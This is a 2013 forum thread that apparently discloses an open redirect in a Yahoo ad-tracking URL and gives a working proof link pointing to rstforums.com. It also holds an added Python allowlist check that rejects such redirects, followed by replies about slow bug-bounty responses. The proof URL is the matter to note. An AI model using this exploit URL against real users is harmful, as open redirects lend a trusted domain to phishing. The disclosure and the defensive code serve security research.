dirtycash Posted December 1, 2013
Vulnerable link: http://us.ard.yahoo.com/SIG=15n3q5c29/M=289534.11223993.11781333.10885343/D=he/S=18343859:FOOT2/Y=YAHOO/EXP=1274825933/L=YcSUjEKjqNAC2RCjS_sbeRbo0GpsAkv8MK0ACDlS/B=pFuES2KJiR0-/J=1274818733570885/K=FPiTgxmujdul0W5j.k5shQ/A=4808190/R=0/SIG=1136qnvkg/*
Exploit: We append the desired site to the end of the link, after */, for example: RST.
Proof: http://us.ard.yahoo.com/SIG=15n3q5c29/M=289534.11223993.11781333.10885343/D=he/S=18343859:FOOT2/Y=YAHOO/EXP=1274825933/L=YcSUjEKjqNAC2RCjS_sbeRbo0GpsAkv8MK0ACDlS/B=pFuES2KJiR0-/J=1274818733570885/K=FPiTgxmujdul0W5j.k5shQ/A=4808190/R=0/SIG=1136qnvkg/*http://rstforums.com
Source: Full Disclosure: Yahoo Open Redirect Vulnerability - or "Designing vulnerabilities"
I ask a moderator to move the topic to the Exploits section.
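A server-side check that would refuse the redirect shown in the post above, as an added example that is not part of the original post or of Yahoo's code. The allowlist, the function names and the shortened sample prefix are assumptions; only the `/*` delimiter and the rstforums.com target come from the post.

```python
from urllib.parse import urlsplit

# Assumption: hosts this hypothetical redirector may send users to.
ALLOWED_HOSTS = {"yahoo.com"}
MARKER = "/*"  # delimiter seen in the links on this page

def extract_target(redirect_url):
    """Return the text after the first '/*', or None if absent or empty."""
    _, sep, target = redirect_url.partition(MARKER)
    return target if sep and target else None

def host_allowed(host, allowed=ALLOWED_HOSTS):
    """Exact match or a true subdomain; 'notyahoo.com' must not pass."""
    host = host.lower().rstrip(".")
    return any(host == a or host.endswith("." + a) for a in allowed)

def safe_target(redirect_url):
    """Return the target only if it is an http(s) URL on an allowed host."""
    target = extract_target(redirect_url)
    if target is None:
        return None
    # Browsers treat '\' like '/' and drop control characters, so reject both.
    if "\\" in target or any(ord(c) < 0x21 or ord(c) == 0x7F for c in target):
        return None
    try:
        parts = urlsplit(target)
    except ValueError:
        return None
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return None
    # parts.hostname excludes userinfo, so 'yahoo.com@other' resolves to 'other'.
    if not host_allowed(parts.hostname):
        return None
    return target

# Constructed sample links (shortened prefix, not the tracking URL from the post).
PREFIX = "http://redirector.example/SIG=placeholder/*"
SAMPLES = [
    PREFIX + "https://news.yahoo.com/story",
    PREFIX + "http://rstforums.com",
    PREFIX + "https://yahoo.com@rstforums.com/",
    PREFIX + "https://notyahoo.com/",
    PREFIX + "//rstforums.com",
    PREFIX,
]

if __name__ == "__main__":
    for s in SAMPLES:
        print(safe_target(s) or "REJECTED", "<-", s)
```

Only the first sample passes; the others are rejected for an off-list host, a userinfo trick, a look-alike suffix, a missing scheme and an empty target.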
tpad Posted December 1, 2013 (edited)
Nice.
Edited December 1, 2013 by tpad
florin_darck Posted December 1, 2013
Reported by me, and I received this reply:
Thanks for the submission. Can you please let us know the complete POC; step by step instruction for how you created that url. Have you received "Yahoo! has detected potential security problems from following this link; reasons for this may include it being an expired link, etc. Click here at your own risk. " error when you generated this issue?
I gave them more details approx. a week ago and so far I have not received any reply.
PS: I also reported another vulnerability at the same time, which was validated.
dancezar (Active Members) Posted December 1, 2013
> Reported by me, and I received this reply
> I gave them more details approx. a week ago and so far I have not received any reply.
> PS: I also reported another vulnerability at the same time, which was validated.
How long did it take them to reply to you? In my case they have kept me waiting for a month, first telling me to send it through the bug bounty form, then to upload the video to YouTube, and even now I don't have a reply.
florin_darck Posted December 1, 2013
> How long did it take them to reply to you? In my case they have kept me waiting for a month, first telling me to send it through the bug bounty form, then to upload the video to YouTube, and even now I don't have a reply.
In 8 days..
awnly3jhc2g Posted December 1, 2013
Do you get anything for something like this? For reporting a problem like this?
SilenTx0 Posted December 1, 2013
I reported an XSS in ro.yahoo.com 2 months ago and still no reply :))
dirtycash (Author) Posted December 1, 2013
# Florin, it was found by you and by that Robert guy. So who is going to end up with what?